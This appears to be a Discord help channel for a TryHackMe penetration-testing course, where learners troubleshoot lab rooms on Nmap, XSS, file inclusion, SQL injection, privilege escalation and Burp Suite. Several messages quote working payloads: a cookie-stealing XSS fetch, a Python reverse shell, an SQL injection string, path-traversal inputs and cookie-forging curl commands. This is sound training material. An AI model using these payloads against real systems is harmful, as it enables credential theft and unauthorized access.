#junior-pentester-path
so when i refresh the page again it doesn't take it to the admin page
Hi guys and ladies. Can you recommend any good free vuln scanner? I tried nmap scan and will do it one more time but are there any other options?
there's a free version of Nessus
@amber scarab thank you
Gave +1 Rep to @amber scarab
Guys and ladies, is it possible that nmap can't find open ports with different types of scans however I know at least HTTP/HTTPS port had to be opened? What can I do in this case to detect open ports?
python3.9 is not working ?
@buoyant sapphire What is the output, if you run command python3 -V on kali? Is that version not suitable for your needs?
Does Nmap probably see the port as filtered, and which machine are you scanning? You can at least try to figure out the reason Nmap says the port is not open or is filtered, by scanning that port specifically and using the flag --reason. I'd suspect the port is interpreted to be filtered and therefore not shown in a basic scan. 🙂
3.11
Could you use that version? Like
python3 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share
I'd think Impacket scripts would work with it.
No it gives the on lines in python code
But in the room it is the same code
Perhaps the script would have to be executed as super user rights, if you're binding the smbserver to port below 1000?
I am already running as a root user
Ah yes.. Are you using your own Kali or an attack box? Just checked the attack box and saw that it doesn't have impacket directory at /opt/impacket/. 🤔
@buoyant sapphire Would this work?
impacket-smbserver -smb2support -username THMBackup -password CopyMaster555 public share
I try to do fast scan with nmap on my own lab. For different types of scans like Xmas, Null and Stealth SYN I see only
"Not shown: 100 open|filtered tcp ports (no-response)".
I expected to have shorter list of ports can be probably opened as we can't guarantee if port open by those scans.
Very first idea to come up is to limit number of ports need to be checked by vuln scanner.
Considering the Xmas and Null scans, it is good to remember that they can only tell you whether the port is open|filtered or closed, not if the port is open for sure. 🙂 Since this is about your own lab, you can DM me about it, so that we can leave the channel for the topic of the Jr. Pentester path. :)
Actually last Stealth SYN scan gave me one open port so nothing wrong with nmap it just mean that I have less experience to use it. Thank you.
Gave +1 Rep to @tulip torrent
Yes i am using my Kali, the directory is available in that location
@buoyant sapphire If you want, you can DM about this if you still have the problem. Sounds like eyes on the terminal could help figuring this out. :) I got quite a bit interested about this.
Whom do I have to DM. and you completed the jr pentester testing path ??
You can DM to me in Discord, though I have to say I'm not staff of THM. I'm just a subscriber wanting to help other people. Quite almost, I'm missing few last steps on Win Priv.Esc. I did however try the problematic phase with attack box and successfully managed to launch the Impacket SMB server. :)
Hello, I am doing Linux privilege escalation: Cron Jobs. The problem: I am not getting a reverse shell. The things I tried: create test.py in the tmp directory and change backup.sh in karen's home folder. Just as a test I ran it and it looks like the syntax is correct since I'm getting a reverse shell (ofc not as root). What could be the problem?
nvm solved it its because I didn't mark it executable
The LFI Challenge 1 is kicking my ass. Every time I use BurpSuite to send a request to change the POST I don’t see the flag. What am I doing wrong?
If I remember correctly I used curl to send POST
@fossil lake Are you doing the File Inclusion room, Task 8 Challenge and trying to read /etc/flag1?
Has burp suite been redesigned in the past few years?
Yes
Just trying it out, managed to get /etc/hosts and such files but not the flag. Just thinking there could be a target machine side problem, though I cannot be sure. Or the flag1 is intended to be achieved in different way.
E: Got it. Lol got my way into terminal on that machine before I realised I was looking at the wrong page, heh.
@fossil lake
So, you're at the page /challenges/chall1.php right? I'd suggest trying || to send the POST request from browser, by manipulating the form on the page || :)
Ok and how do I do that?
I suspect that the reason why only changing the type from GET to POST on BurpSuite may not work, is that if you intercept a GET request (and change get to post in text), it does not contain a very relevant thing for the web server backend: the header Content-Type: application/x-www-form-urlencoded.
You can open your developer tools on the browser (i.e. right mouse click the web page and select "Inspect", or press F12 on the keyboard). Find the form in the HTML source code and change the relevant thing there. You'll find an ||HTML form element that contains an attribute with the value "GET"||.
hi guys, I'm doing the Metasploit Exploitation room and I keep getting this message. Did I miss something ?
There sometimes can be problem when using windows paths with meterpreter, as \ may be interpreted as an escape character. Try using double backslashes \\ instead. :)
gg, that worked. Thanks. I'm so dumb in windows haha
Ok thank you
Gave +1 Rep to @tulip torrent
@tulip torrent IT WORKED THANK YOU
Gave +1 Rep to @tulip torrent
@tulip torrent Yeah, ty! I used to much of my time in burp for this lol
hey guys, nice to meet you all!
Hi, starting this today !
I'm wondering, is the Practical example (BLIND XSS) on the last task 8 bugged or something?
even in the attack box I still did not receive any encoded cookie on the netcat terminal ):
cuz I try from my own vm and the THM machine same issue 
Hi, anyone got idea how i can change my name that's on my certificate?
@tiny bluff
😆 cheers mate. it would be my last resort.
Well, that is your option, other than creating a new account and doing it all again.
Hi guys nice to meet everyone
Just finished lfi rfi
The file inclusions challenge really burned me
😅
It really was tough task
👍💪
hey guys, im doing "active reconnaissance" task 6 netcat, but i dont get any response by the terminal when using nc ip port on my vm else on the attackbox, any ideas?
ok, seems like i overread the question and tried port 80 instead of 21... ^^
Hi everyone, I have some issues with the task5 Linux Escalade,
When I have uploaded the exploit "37292.C" and compile it with gcc 37292.c -o Ofc
I get an error message, i really don't understand, can someone help me?
Thanks
Did you compile it on your kali VM or on your target? If on your kali VM, the gcc version in it may not be compatible with the gcc version on your target.
Thanks a lot for your response, i compile it on my kali vm
Gave +1 Rep to @prisma raptor
So like you said it's better if I compile it from the target like that I'm sure that I have the same version of gcc?
That is correct. You can also check if gcc is installed on your target first, otherwise, you would have to look for another exploit.. or look for something written in python or any other language for that matter
socat is so confusing with the many syntax. gosh
Hi guys and ladies. Any useful tricks for blind XSS? I mean what can I do to research and get something valuable from web form susceptible XSS vuln? Maybe useful tools like XSSHunter can help? Or you found GitHub repo with useful payloads?
So I'm kinda confused about SSRF Task 2, I managed to get the flag but I'm not really sure why this particular appendage to the url for the attack works, could someone please explain to me why this results in the flag?
Any one could explain me task 4 from "Authentication Bypass". I followed the steps and get the final flag. But I don't understand how will I know when there is this kind of vulnerability. I mean, how do I know there is a PHP variable $_REQUEST which is used to send the reset url?
Second question. If the final step is a POST request, why the curl is not using the -X POST method?
For your first question : The use of the $_REQUEST variable in PHP is not in itself a vulnerability. The vulnerability arises when the application does not properly validate or sanitize user input that is passed through this variable. To identify this kind of vulnerability in an application, you would need to perform a thorough security assessment of the application.
For your second question : The curl command used in the challenge does not specify the -X POST method because curl defaults to making a POST request when it sees the -d parameter, which specifies the data to be sent in the request body.
There is a pretty good tool, which is an extension that can do a lot of stuff : https://github.com/LasCC/Hack-Tools
Thanks, I'll try that
Gave +1 Rep to @gray nimbus
can someone help me with this
./code: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./code)
if i remember correctly, best way is to use attackmachine in that case
it's issue with compatibility on local VM. the THM machine is set up to that work
will try now , thanks
np
Good day guys and ladies. In the Jr. Pentester Path there was a mention of a quite sophisticated Nmap scan technique called Idle/Zombie scan but I'd like to have a deep dive into it. For example I can't find answers to my questions like 'how to find a zombie for this scan' or 'is it possible to combine a zombie scan with decoys'. I appreciate any useful article about this topic.
Hi. Got an issue in Metasploit: Exploitation, task 2. What can I do? I set the right RHOSTS parameter and I got an error. What's wrong?
Hi. In net sec challenge (social engineering ftp password) this task is taking a long time and it's still running
What do you mean?
Can you link the room & task.
are you on VPN or attack box? have you tried running msfupdate ? I just tested it on the attackbox and it worked as expected from there
I use attack box and I ran msfupdate. I tried three times. I don't understand
What command are you running
hydra -v -l usernamefile -P passwordfile ip ftp -s portno
yeah that is odd! I'd try the good old turn it all off and on and try again.
That's what I'm doing.
Username file? You don't need a file for the usernames, they're already given to you, you just have to try them both
I have put the two names in a text file😅
Oh okay, I believe the flag when you use a file for the usernames is a capital letter -L
Great 🙂
💪👍
I found, by using a second prompt. On the first I only ran msfconsole and msfupdate. On the second I ran msfconsole (no need to update), and then the search, the RHOSTS set and it worked.
2 or 3 hours on that problem.
Anyway, thank you for having tested this command on your side.
Gave +1 Rep to @amber scarab
so frustrating when a bug causes you a problem - glad you got it sorted!
Hello guys I hope u all doing fine
I just want to know does anyone finish the SQL Injection and the task8 to be more specific?
I learned a lot today (;
but I still struggle in the task 8 ):
I found the schema table and the table name
and that is what I wrote to find the COLUMNS schema(name)
' UNION SELECT SLEEP(3),2 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA= 'sqli_four' and TABLE_NAME = 'analytics_referre_s' and COLUMN_NAME like '%';--
but it says OK ! even though I did not define the first letter after the COLUMN_NAME like '%';--
I doubt about table name. More logical name will be analytic_referrences. You can do back one step and try to retest table name first.
Hey, Has anyone completed the Pentesting tools series? I'm struggling with John the Ripper > https://tryhackme.com/room/johntheripper0 < I can't seem to get John the Ripper working in Linux debian 11 so my only option is to use the Attackbox on tryhackme, is this possible? we are asked to download the hash.txt files and I can locate the files easily on my personal computer using Linux but I'm thinking about how do I locate the hash.txt files using Linux in Attackbox via tryhackme.
ultimately they're just .txt files (most of them), you can just copy the contents of each file into a new file on the Attackbox
if you're subscribed you can start a python server on your Linux machine, and use wget to transfer the files to the Attackbox
Are you referring to the Attackbox that requires a subscription to start a python server?
yes
but it would be the opposite in this case? server on the local machine and they could get the files that way
Hello guys ! I have a question in the room File inclusion > Challenge > flag3. With the command curl, i find the flag, but using the inspector of firefox, it doesn't work. How is it possible? In the 2 cases, i do the same (sending a post request)
That's a good idea, I'll give it a shot. Thanks 👍
Gave +1 Rep to @zealous dew
Hi guys just at the end of the course .can you guys suggest me for some practice after the Jr pentester course
Any boxes,machines or a list
What path should I pursue next, the Red Teaming or Offensive? I just finished the JR pentest
I just came in to ask this Q too lol I will finish this room this month 42% still 58%
yep I was thinking like u but it display false token when I write analytic_referrences ): I search for the way to solve it but they all just show the answer not the method of how to do it.
- sometimes if it's not always when I write _ it says true and IDK why (:
I think task 8 in SQLi have some logical error but I need to understand it ):
hi, I'm in the content discovery room on the jr pentester path, and the attack box is giving me an error 405
unsure if I need to be here or if I need to be tech support
Hi! I'm on Wireshark 101 and I'm doing Task 12, which is HTTPS Traffic. The last question, "What is the User-Agent listed in packet 50?", won't let me put in the answer in the correct format. I found the answer online but the format is different from the answer box. Does anyone know the correct answer to that question?
Are the Nmap and hydra rooms in CompTIA redundant if you've already done junior pentesting?
they are different
@amber sail if you inspect the page at the answer box, usually you can find evidence of the formatting of the answer but you have to dig in there a bit. Also the hint box sometimes shows what format it expects but if you're asking, you probably tried that already.
There's no hint to this question. I googled the question and got the answer but it doesn't fit the format of the answer in the answer box.
Anybody have any suggestions on how to consistently access or at least fix the victim IP address when completing rooms? For example, I'm having issues with the LFI room (https://tryhackme.com/room/fileinc) and every time I spin up the machine and attackbox, I still can't get the IP address of the machine I'm supposed to attack, even after a refresh
In this particular room, the link in question is http://webapp.thm/get.php?file=/etc/passwd . I'm waiting for the domain "webapp.thm" to change to an IP address, but it doesn't. Even if I type as is in the firefox browser, it times out as I expect it. So I assume that the domain is supposed to change to an IP address. Am I wrong?
that's only an example, the machine to deploy is in task 2 and this is the link that will change to the IP
Oh I see! I got it now. Previous rooms provided the Machine IP as you go, so I was stuck for awhile thinking there was a bug or something. Thank you!
Gave +1 Rep to @zealous dew
You're welcome 🙂
Hello! Just attained my Jr. Pentest Cert from THM. I have a solid background in IT and I'm looking to take my skills to the next step. Would I go for an industry standard cert like CEH or would I start looking for real world experience, and if so how?
So I'm doing Linux Privilege Escalation, Task 5
I've gotten to the point where I transferred the kernel exploit from my local machine to the target machine, and now I need to convert the file with the gcc command. I do that and I get a huge list of errors that are within the exploit itself. Is this supposed to happen? Am I supposed to debug the entire exploit source file, because I'm not at that skill level lol
Or is there something going on?
The syntax I'm using is:
gcc exploit.c -o exploit
I figured out what was going on
When I ran wget on this exploit-db page, I wasn't importing the actual exploit, I imported the source code of the webpage itself. So the exploit wasn't working when I was trying to run it. Replaced the web source code with the exploit source code on exploit_db and it worked
Mistake made, issue resolved, lesson learned
what is the correct value for the cookie?
Hi! I don't remember, sorry!
Hi guys Im doing linux PrivEsc module and currently on the NFS section. Im trying to run my compiled binary from the mounted directory and it says that the glibc version that is used to compile the binary (GLIBC_2.34) is not found
Hi Guys. I'm stuck in What the Shell room, task 13, Question 7.
I have to login over RDP. But I have no idea to achieve that. Could anyone help me?
Have you looked at Remmina or xfreerdp?
I think that is Task 8 as 7 is getting a reverse shell using Powershell
Well I have searched on the net and found Remmina or xfreerdp. So you advise me to install Remmina on my attack box?
It seems there is a mismatch between the gcc version in your kali VM or Attackbox with the gcc version in your target.
I've done the reverse shell by PowerShell. But I don't know how to login
Did you try to compile it on your target instead
Compile what?
This was for @tawny salmon
Sorry
To clarify, you're on Task 8 right?
If you are, you need to install Remmina on your kali VM, I think this is already pre-installed on the Attackbox if I remember correctly
No task 13, 8th question
I created a user with the reverse shell and I don't know how to process the login
You can use Remmina (GUI option) or xfreerdp (CLI option).
Ok, but where shall I install it? On my attack box shell? On the reverse shell? And then how do I run it?
I checked just now and you can find Remmina in the Attackbox - /root/Desktop/Tools/Miscellaneous directory
Or if you are in your kali VM, you can find install instructions in Google.
Great. And where should I run Remmina? And how?
It's pretty straightforward, open Remmina and enter the ip, it will then ask for the credentials
Thanks. I will try
Gave +1 Rep to @remote iris
@remote iris Pretty straightforward, I agree. Thanks a lot. It worked.
Gave +1 Rep to @remote iris
@prisma raptor Thank you for your help. I logged in successfully
Welcome, glad I could help.
Question. After doing the last question of Cross-Site Scripting (Practical Example (Blind XSS)), in the final task you have to insert this xss:
</textarea><script>fetch('http://{URL_OR_IP}?cookie=' + btoa(document.cookie) );</script>
And stay listening in netcat: nc -nlvp 9001
Question is: Why does this only work when you do it in an attack machine and not in my own VM? I was not able to receive any request to my Netcat in my VM (in the attack machine yes). So I would like to understand why, because in the real world I won't use the attack machine
I find this path a bit weird as somehow it requires you kinda know burp suite and some other things before you get to that part ^^
It's something to do with the subnet of your VPN.
For example, I'm able to do it on my VM.
doing the complete beginner pathway would benefit you if you run into things you don’t know prior to the module
well it's ok. I've done all of that in a faraway past. Just seemed a bit "off" within the course
This is a channel dedicated to the path.
If you need help with specific room, just ask
Actually I have a couple of questions
1 RFI / LFI challenge 3. I couldn’t use null byte. Which way should be right?
2 What is the best way to improve knowledge after theory?
what have you tried exactly? null byte should be part of the solution
Unfortunately it didn’t work
Neither %00 nor 0x00
I changed type of request to POST, and put data in text field
Browser url could send only GET
try burp
Burp is the next level)
alternatively, it can work from the dev tools
I have finished that with RFI, but it seems to me it should be LFI
How can dev tools help me avoid .php?
dev tools can help you edit the request to POST and make sure the nullbyte is sending correctly
As I mentioned previously, I had changed the request to post, but the null byte still did not work
how did you change the request?
what's probably happening is the % in the nullbyte is getting url encoded to %25
after you send the request, have a look at it in the network tab in devtools. if it ends with %2500 instead of %00 then edit and resend the request deleting the 25
Thank you, maybe it is
By the way, null byte works only on old php versions. Don’t you know if there way for a new one?
Or maybe another approach?
I was just wondering the same thing after seeing that note in the exercise, but the answer is out of my league for now 🙂
Php compiler or pure c Lang should know the answer, maybe later I will do a little research
it seems I have found
are you talking about the RFI? Yea i noticed that i had to change the form to post in the dev tools and then edit the target url in burp.
changing it to "post" in burp basically is too late as there's a difference in how your browser sends a get / post request
the "why" behind this i don't understand myself
tried to look for some explanation online, and i came across some write-up of the room where they changed all the settings in burp...
So i'm guessing maybe browser behaviour changed in the meantime or something ?
I think the problem was in browser encoding. I still have not started using burp
oh yea probably then as well
because if you add it to the url-bar, it will be a get request
Even with post null byte didn’t work
It sounds interesting… I will learn burp soon
I'm trying to create and than print out the cookie, but somehow cookie is not even created, I can't see it both on the page and in devtools🤔
<html>
  <head>
    <script type="text/javascript">
      document.cookie = "username=John Doe; expires=Thu, 31 Dec 2023 12:00:00 UTC";
    </script>
  </head>
  <body>
    <script>
      window.alert('XSS'); //this works
    </script>
    <h1>COOKIE:
      <script>document.write(document.cookie);</script>
    </h1>
  </body>
</html>
What am I doing wrong?
By the way, as I remember, there has to be an entry point in JavaScript, like the document load event
Hi there, i am having the same issue with the IP http://MACHINE_IP/about/2 on Task 8 - Extra Mile SQLi with Repeater of BurpSuite: Repeater
could you please give it a view / thank you in advance
@shadow echo
Done!
what the problem here
i have added the user but can't rdp with that username and pass
do they have enough rights?
being able to create a user doesn't mean they can rdp
also .. isn't it administrators ?
instead of administrator
it is ....
Time to learn red stuff. Hopefully everyone's enjoying this path. I basically know nothing about red team things so I'm excited to be here and learn from everyone here. I'm grateful I'm on the junior pentester path with you all.
The good question is what can I learn after Jr. Pentester Path?
@tranquil citrus Do you mean generally, or like which path to go after Jr. Pentester?
I mean which path it's possible and will be good to enroll after Jr. Pentester.
I've been thinking which path to enroll next.
@tranquil citrus Well, that depends on what you would like to learn and where you want to head to in the field of cyber security. I think many people enroll to Red Teaming or Offensive Pentesting after Jr. Penetration Tester path.
Red Teaming, as the name implies, provides information about Red Teaming and a bit from the perspective of cyber security exercises too; how Red Teams act, what the purpose of Red Teaming is, how to plan an RT exercise, and teaches many techniques used during those exercises.
Offensive pentesting on the other hand is about attacking different kinds of targets and has challenges for buffer overflow exploitation.
Something those paths have in common is the Active Directory module. About those buffer overflows, I've got the impression that if you don't have experience with them, they may be a bit tedious.
Go with whatever you feel is interesting or supports your goals in cyber security. 🙂
@tulip torrent , thank you for description
Gave +1 Rep to @tulip torrent
Congrats me, I finished the Jr. Pentester Path.
congrats! 👏👏👏
Thank you
@tranquil citrus how long it has been?
It took me around 2 months but with 2 weeks of vacation when I did nothing on this course. I went quite well at the beginning but slowed down on Privilege Escalation. This is probably my worst domain of knowledge now.
https://tryhackme.com/resources/blog/jr-pentester-interview-guide
Fun to mention 😀
I am also on Burp suite section so far probably my favorite as of now.
Why is it your favourite?
@merry night QA wise, I have an issue with one technical question in this. Decrypting an NTLM hash?
You need to verify your discord account first
!docs verify
the message box in the bot
don't appear to me
i see only the note.
Ah you must have turned that off in settings
But here you go:
https://help.tryhackme.com/en/articles/6495858-discord
^
Hello guys, i have a problem in "Vulnerability Capstone". I can't run the exploit, when i do python exploit.py (IP/--help). Can someone explain it to me please
Hello guys, I am doing the "Linux Privilege Escalation" box and in Cron jobs section the backup.sh worked fine after I made it executable. But using the /tmp/test.py is not working. I created the test.py with following content and made it executable.
import socket
import os
import pty

def run_shell():
    # "IP" and PORT are placeholders for the listener's address, replaced before running
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("IP", PORT))
    # redirect stdin, stdout and stderr to the socket
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    pty.spawn("/bin/sh")

if __name__ == "__main__":
    run_shell()
But not getting the shell?
You should specify the IP and port
What error message do you get?
Whats the error?
It's ok, it was a problem of compatibility with python3. I didn't understand everything but it works
I suppose that the script is too old
Module: introduction to web hacking
Section: Subdomain Enumeration
Task 6: Virtual Host
I tried using the provided code template "ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://MACHINE_IP" but didn't get the expected result. If someone has already done it, please help me
what are you getting? I assume you started the machine from task1 and used the machines ip and not http://machine_ip/ ?
Yes, i used the machine ip (ex: 10.10.23.12)
What it return?
can you see ffuf doing anything? does it list thousands of subdomains or nothing at all?
Hi, I'm stuck on the very last question in https://tryhackme.com/room/fileinc - I'm supposed to use RFI, but can't manage to make it include remote files. It doesn't even try to access them. Would appreciate some guidance here
That's obvious, I replaced the IP and Port before sharing here.
hi guys, I am going last task in XSS block, so I am entering in text box "</textarea><script>fetch('http://localhost:9001?cookie=' + btoa(document.cookie) );</script>" . But nc doesn't receive any request, tho is I will open the ticket - I will get my cookies. So I can say that script is correct. How did you solve this task? I use machine, offered in the task.
if someone else (like the admin) executes your xss they also call it with http://localhost:9001. However, this is their own localhost and not yours.
make sense. but which url I have to call then?
what have you attempted so far?
I am doing the task 11 (Linux priv). Now, when I am running the thm on the karen machine it is giving this error
./thm: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./thm)
How do i solve this?
Hello everyone! I have a stupid problem in BS module, “Practical example”. I have used both usernames and passwords list, pitchfork type, but I got the same content length (674). No exceptions. What did I do wrong?
I am not sure, but the main signature looks weird. It is expected to have *argc (count of arguments) and *argv (arguments) pointers. You had better check it
Pure c is very difficult language)
Saw some walkthrough videos and they did the exact same thing. But I am getting this error.
Code is fine I guess.
1 could you show your error?
2 maybe you also have to compile this in binary with “make” command, and start like “./thm “?
I can be wrong, I have been studying pure c about 9 years ago
It is compiled
It's a dependency issue
@shut stirrup Your attacking machine and your target aren't close enough, they're using different glibc versions. You can compile statically, or compile on the target machine, or spin up a VM with the same version to compile on
target machine does not have gcc. Will spin up the Attack box. Hope that works
Maybe you can help me with my trouble?
I cannot
Thanks, used the AttackBox and it worked fine 🙂
Gave +1 Rep to @idle bison
Reboot solved my trouble
More or less everything that I did in the previous labs in that room. I've spent hours trying to understand what works and what doesn't. So far I know:
- using http://machine_ip/[whatever here] works, but not https
- replacing machine_ip with localhost above works too
- I get a different error msg if I try to read a directory that exists, so I know that etc/php/ exists but haven't been able to drill down further to find the php.ini
- So far no success at all on attempting to access a file outside its own network. From what I can tell, it didn't even make such a request
it has listed thousands of subdomains @@
I came for a question, I did not have to ask... Thank you 🥲
Gave +1 Rep to @shut stirrup
In that case you need to tell ffuf how to detect if it is a real hit or a “this subdomain doesn’t exist”. Look at the mentioned -fs option for example
That task is about remote file inclusion, so they want you to somehow point to a file on a different server. How have you tried doing that, what did you point it to and how could you tell it didn’t work?
I set up a file on host server, tried both with a txt-file (with php code), and .php-file that would execute already on my server so I'd be notified if it was accessed. It wasn't
I still don't understand very well, can you give me an example and the byte size after -fs
If you let the command run and look at the thousands of subdomains it spits out, it tells you in the same line what the size of the response was. The assumption is that the size is the same for all incorrect subdomains and different for correct ones. So if it says response size 302 you can put -fs 302 to not display any results with that size
That should work fine then, can you maybe send a screenshot of what you are putting in the playground input field? Maybe you are using the wrong ip address and the server can’t reach it
I was using a domain, not IP...and I've tried with several other domains too (not owned by me) - none of them are fetched
oh, you are supposed to host it yourself on the attack machine that is in the same vpn as the vulnerable machine, the vulnerable machine might not even have real internet access
Thank you very much, I have completed it!!!
Gave +1 Rep to @restive sage
oooooh! although it did have internet access unlike many other machines, so I thought it was supposed to be like this
ah, the vulnerable machine... got it, I should have connected the dots. makes so much more sense now
thanks a lot! 🙂
Module: Authentication Bypass
Task 5: Cookie Tampering
Question: What is the flag from changing the plain text cookie values?
Based on the information "Set-Cookie: session=eyJpZCI6MSwiYWRtaW4iOmZhbHNlfQ==; Max-Age=3600; Path=/", I decoded the base64 and obtained {"id":1,"admin":false}; I modified it to {"id":1,"admin":true} and encoded it back to base64, resulting in "eyJpZCI6MSwiYWRtaW4iOnRydWV9". However, when I used the command: curl -H "Cookie: session=eyJpZCI6MSwiYWRtaW4iOnRydWV9" http://10.10.153.107/cookie-test, it still says "Not logged In". Can anyone help me?
hi everyone,
i have some issues with task 11 Linux escalation,
"./nfs: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./nfs)"
I have understood that i need to update GLIBC (on my machine) or have the same version as on the victim machine.
But how can i have the same GLIBC ?
I can't create my file directly on the share because i can't compile it
there is something i don't understand, can someone help me ?
Thanks
the easiest way is probably to just use the AttackBox instead of your own PC/VM to compile or compile on the victim machine if that one has gcc available
maybe try curl --cookie "session=abc" instead of going via header? or set it manually in the browser
ok ok i'll do it with the attackbox, it's easier for me
thanks a lot for your help
Hi everyone!
I am discovering Burp Suite Intruder, and I have no idea about the following:
- when did we get the param for “loginToken”? GET /login/admin doesn’t have one. So what do we get to replace in the POST?
- as was mentioned, if we had the response on the same page, we could use recursive grep. In which way? From where do we have to extract them?
Looks like I got the answer to the first question
Also I have noticed that in the results, session cookies are changed only in the response, not in the request. It’s a bit strange to me
Hi, everyone! When starting as a beginner pentester, is a Kali Linux image suitable or should I use it as a main OS? Thanks for replies!
It is possible that the lesson's information is incorrect, based on the information provided in the 'Set-Cookie: session=eyJpZCI6MSwiYWRtaW4iOmZhbHNlfQ==; Max-Age=3600; Path=/' statement. I tried using the command 'curl --cookie "session=eyJpZCI6MSwiYWRtaW4iOmZhbHNlfQ==" http://10.10.x.x' and the result was 'Not logged in'
Maybe I’m mixing it with another room but do you maybe have to change the id too?
Have you been taking notes?
The cookie is persistent; I tried refreshing the provided ID, but the issue remains the same. Could this be an error caused by the lesson?
I remember doing the lesson and I don’t think I had any problems
I think I set the cookie manually in Firefox and refreshed and that was it
@bright cipher the worst thing to do when you're learning is to think about the time lost
Note taking really saves time in the long run, not only do you retain more but if you have forgotten something it's much faster to refresh your memory by looking at your own notes than going back through entire lessons or videos to find the key information. It's also good practice for actual pentests where you will constantly be taking notes as you work.
But keep in mind, this is a very complex field: watch videos of people who are excellent at this and you'll notice them forgetting or making mistakes on common commands. No one expects you to have everything 100% in memory. The key is to understand the main ideas and know how to find more information efficiently when you need it. Also, don't forget that it's not unlike learning a language or a sport: practice, practice, practice. There simply is no quick and easy way to get good at it.
I remember being surprised early on by the suggestion of watching a walkthrough of a box and then doing it on your own a few days later. It felt like it would be far too easy after just a couple of sleeps to repeat what I had watched someone else do. Oh how wrong I was. 😄
In short, I think one key to protecting your mental health is managing expectations: learning this is difficult but doable, it will take time, focus on what you have learned instead of what you have forgotten, and be kind to yourself.
I've noticed a lot of rooms re-address content you've done before as well, so no need to get too anxious about memorizing every little thing
I tried manually installing cookies on Firefox, but I can't seem to find the 'Add Cookie' option in the 'Storage' section of the 'Inspect' tool
I'm not sure if you ask for this but 'plus' button allows to add cookies value for particular website.
I have tried the following steps, but still couldn't succeed (How can I send images? I am unable to upload images here)
You may verify first to upload images
I have added the cookie but still cannot log in. Could you please take a look and help me troubleshoot?
you are doing Authentication Bypass - Cookie Tampering, right?
That's right, and Question:
What is the flag from changing the plain text cookie values?
you are too far then, you are supposed to set the cookies from the beginning of the section without any base64 stuff
base64 stuff only happens in the 4th question
I still don't quite understand the process. Do I need to use a similar command like 'curl -H "Cookie: {"id":1,"admin":true}" http://10.10.117.136/cookie-test'?
the solution is basically already in the lesson in the CURL 3 box
you can use curl or set the two cookies in firefox directly
So, are you implying that your intention is "curl -H "Cookie: {logged_in=true; admin=true" http://10.10.117.136/cookie-test"?
without the {
Great!!! So, it's actually simpler than what I had been thinking. Thank you very much, love you
yea you were trying the harder thing already lol
Module: File inclusion
Task 8
Question: Capture Flag3 at /etc/flag3
I changed the method from 'GET' to 'POST', but I'm unable to remove the .php extension. Could you please take a look and assist me?
try doing it with burp, if you do it like this the %00 gets urlencoded to %2500 and won't get rid of the .php anymore
But before learning Burp, do you have any other alternatives to remove the .php extension in this case?
you can do it with curl too
it's just when you do it like you are doing now you are actually sending %00 instead of the null ASCII character that %00 is supposed to represent
So, are you implying that your intention is 'curl -b "THM=admin" http://10.10.49.209/challenges/chall3.php'?
=> 'curl -b "THM=/../../../etc/flag3%00" http://10.10.49.209/challenges/chall3.php
-b is for cookies, you should look up the two parameters needed to send a curl request as POST and how data is sent by curl when using POST
or you can send the post request in firefox, find it in the network tab and then rightclick -> copy to curl
I have tried again and received the result as
you probably have to url encode your post data (make sure not to url encode the %00, that is already encoded) and then set the Content-Type header to let the server know it is url encoded.
I don't know how to proceed anymore 😢
Do %00 instead of %2500 at the end of your data and that should be it
it's still not successful
Hey guys and ladies!
Have you ever seen that nmap discovered the same quantity of ports but every time with different port numbers on a Stealth SYN scan?
Can I start doing machines right away or should I complete the Junior Pentester learning path first?
It depends on your approach or preference, but you can work directly on boxes or rooms of your choice.
Well then. Maybe I'll try some later this day. Thank you. 🙂
question: I'm in the Net Sec Challenge in Network Security, question:
How many TCP ports are open?
i would say 5
What did i do wrong?
by default nmap only scans the 1000 most commonly used ports.... but there are 65 535 ports and therefore a huge chance to miss some if you do not scan all ports.... look into the -p option for nmap
@sage current ok ty
Gave +1 Rep to @sage current
so i should scan -p 0-65535 so as not to miss one?
yeah or -p- which would scan all ports
still seems like you found the missing one now
there is also the nmap min rate option or the -T4 or -T5 to speed it up
yes, other question: it says "65530 closed ports" but they show 6 open ports, so there should be 65529 closed ports, or not?
or do i have a misunderstanding? ^^
@sage current ty
Gave +1 Rep to @sage current
well in your first image there are only 5 open ports... the correct answer is 6 which you can see in your second and last image
Hey, I'm on Linux Privilege Escalation : SUID, and nano should have an s-bit set so I can read /etc/shadow etc, but it hasn't...
Did I miss sth?
yes, nano is only an example, you have to find the correct binary yourself on the machine
ah ok, thanks :)
Hello i need help Authentication Bypass task 3 . I dont get the usernames and passwords
0
how did you make the username list? I just tested it and it worked fine if I made the username list manually, but if I tried piping it from the ffuf results, as the directions indicated, it got messed up. opened it in nano and sure enough even though I thought I used "cut" to clean it up nicely when I piped it, there was a ^[[2K before every username
which didn't show when I used cat to check the list
The valid_username.txt should be the previous step's results, there are four names, separated: admin/robert/simon/steve, so you can cat valid_username.txt to check this.
Hi..could u help me guys..
When I try to connect with ssh tryhackme@iptarget, there is "permission denied (publickey)"..
what room and exercise are you working on?
I don't see anywhere in those modules where you would need to use SSH
are you trying to connect from a virtual machine ?
BURP SUIT QUESTION --- Hi, can somebody please explain to me how exactly do I read the Burp Sequencer output? The whole graph thingy and the stuff about bits and stuff. Thanks guys.
Aaahhh... I see..
You're right... 😆
OWASP Juice Shop | Task#6: Question #2: View another user's shopping basket!: I have changed the parameter to basket/2, even though I could see the other user's Raspberry juice order, the flag is not appearing, I tried to relogin to the admin account, but to improvement
*no improvement
Bruh i feel like this is a rabbit hole the creator intentionally did
in Windows Privilege Escalation -> Abusing vulnerable software
hooray complete this path
Burp Suite Intruder Task 10. Input the word lists and ran. Attack has completed but found no success. Is this a bug? Currently trying the cluster bomb attack in case it's mixed a username/password during its build.
congrats!
you might have more luck asking in the room-help channel, Juice Shop isn't part of the jr pentester path
I just checked and found it with the pitchfork attack. Make sure you have usernames set as payload1 and passwords as payload2. And when you look for a result, try sorting by Length to see if you find one that is different from the rest. All attempts will get a 302 redirect code regardless of their success, but a successful login will get redirected with a cookie attached.
I have mine setup like this, and tried it several times. All requests respond with 302 status and size 674.
